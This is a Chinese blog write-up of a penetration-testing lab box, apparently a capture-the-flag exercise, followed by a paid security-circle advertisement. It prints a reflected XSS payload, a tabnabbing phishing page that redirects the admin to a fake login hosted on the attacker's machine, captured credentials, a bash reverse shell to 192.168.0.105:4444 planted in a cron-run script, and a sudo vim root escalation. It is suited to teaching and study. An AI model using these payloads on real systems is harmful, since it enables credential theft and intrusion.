记一次突破“思维“渗透

要想玩儿的转,首先得突破固化的思维,当渗透作为固化的思考方式的时候,很难有所突破,固化的姿势加上灵活的思路才有得玩儿。从利用模拟钓鱼来进行信息搜集,最后实现权限获取

信息搜集

探测目标ip地址,用什么工具都可以,看自己兴趣 netdiscover -n 192.168.0.105/24

图片

扫描端口 nmap -A -p- 192.168.0.103

图片

思路

就这种BC的套路,22端口爆破的几率不大,80端口访问一下,发现是登陆页面,这个登录页面,没有cms类型识别,但是能注册

图片

注册账号登录

图片

在框内输入内容之后然后会进行跳转,类似于csrf操作。但是如果访问

图片

直接跳转百度,闭合标签,构造payload,反射型xss

1'></a><script>alert(1)</script>

这个时候以为春天来了,难不成弹cookie然后admin登录么

1'></a><script>alert(document.cookie)</script>

图片

也是想多了。这个cookie是自己的,不是BJ给的。那么这里想要怎么去利用这个漏洞呢,其实上面的提示已经提示

Please submit your link so that we can get started. All links will be reviewed by our admin

这个时候思路需要广,构造钓鱼页面,等待系统给我们admin的密码,构造登录页面,自动跳转到登录界面,构造两个页面一个首页一个钓鱼页面 fish.html

<!DOCTYPE html>
<html>
<!-- author:Ggoodstudy-->
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.0.105:4444/index.html');
    	if(window.opener!= window)  window.opener.parent.location.replace('http://192.168.0.105:4444/index.html');
    </script>
</body>
</html>

index.html(由于篇幅限制,仅展示了部分,完整获取请看文末)

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body{ font: 14px sans-serif; }
        .wrapper{ width: 360px; padding: 20px; }
    </style>

图片

图片

得到的有username和password

username=daniel&password=C@ughtm3napping123

但是是登录失败的,应用失败,但是ssh成功,请求包内的数据竟是经过编码的所以url解码

图片

这个BJ没有flag.txt

水平提权

uname -a

图片

奈何无法突破文件上传,否则这里可以直接提权到root,可以直接实现垂直提权的

图片

该路径下存在文件,但是不知道能做什么,起码user.txt是打不开的,但是看到py文件感觉像是使用os提权,os模块进行提权,尝试一下

图片

有点儿意思,两分钟执行一下脚本 vim query.py

图片

没成功

图片

为什么想着使用这种思路,我以为是跟ICA1的水平提权一个套路,然而并没有成功,反弹shell执行一下

图片

vim 写入反弹shell bash -i >& /dev/tcp/192.168.0.105/4444 0>&1 修改脚本

图片

图片

反弹得到shell

垂直提权

接下来垂直提权 sudo -l

图片

vim 有root权限,直接保存的时候执行bin/bash sudo vim -c '!/bin/bash'

图片

得到root权限

小结

一波三折吧,BJ也是不要固化思路,经验多的话也是好事,但是解决的过程中也不要固化思路,一条道走到黑并不好。

圈子的最近主题和圈子内部工具一些展示」

纷传100%官方认证授权,可在发现-圈子页面查看

图片

圈子部分内容展示

图片

poc漏洞库 8000+src陆续更新中 -紧跟时代发展争做先进网安人

图片

一起愉快刷分-榜上有名

图片

免杀-护网必备

图片

新手学习、老手巩固-温故而知新

图片

学习报告-三人行必有我师

图片

各类会员-尊贵的SVIP

图片

图片

 

「你即将失去如下所有学习变强机会」

学习效率低,学不到实战内容

一顿自助钱,我承诺一定让用户满意,也希望用户能给予我一份信任

【详情下方图片了解】,【扫下方二维码加入】:只做高质量优质精品内容」

圈子目前价格为¥99元(交个朋友啦!),圈子每天都会更新内容,老用户可永久享受初始加入价格,圈子内容持续更新中

图片

公众号:【吉吉说安全】,对我发消息【20240607】免费获取」

图片

免责声明

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
一次完整的渗透测试流程通常分为以下几个步骤: 1. 阶段一:信息收集 这个阶段是为了获取目标系统的信息,包括IP地址、域名、网络拓扑结构、操作系统、服务、应用程序等等。渗透测试人员可以使用各种工具和技术,如端口扫描、WHOIS查询、DNS枚举、搜索引擎、社交工程等。 2. 阶段二:漏洞扫描与分析 在这个阶段,渗透测试人员会使用各种漏洞扫描工具对目标系统进行扫描,以识别潜在的漏洞和弱点。渗透测试人员还会对扫描结果进行分析和验证,以确定漏洞的可利用性和危害性。 3. 阶段三:攻击与渗透 在这个阶段,渗透测试人员会尝试利用已发现的漏洞和弱点,对目标系统进行攻击和渗透。这可能包括使用已知的攻击工具或编写自定义的攻击代码,以实现目标。 4. 阶段四:提权与维持访问 一旦成功渗透到目标系统,渗透测试人员会尝试提升其权限,以获取更高的访问级别和更敏感的信息。然后,他们会尝试维持对目标系统的访问,以便长期地进行监视和数据收集。 5. 阶段五:清理 在完成渗透测试之后,渗透测试人员会清理所有的痕迹和证据,以避免留下攻击痕迹和可能被发现的证据。这包括删除系统日志、恢复文件时间戳等。 6. 阶段六:报告 在完成渗透测试之后,渗透测试人员会生成一份详细的报告,列出所有发现的漏洞和弱点,以及建议的修补措施。此报告将提供给客户,以便他们能够采取必要的措施来保护其系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吉吉说安全

感谢打赏,交个朋友!有困难找我

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值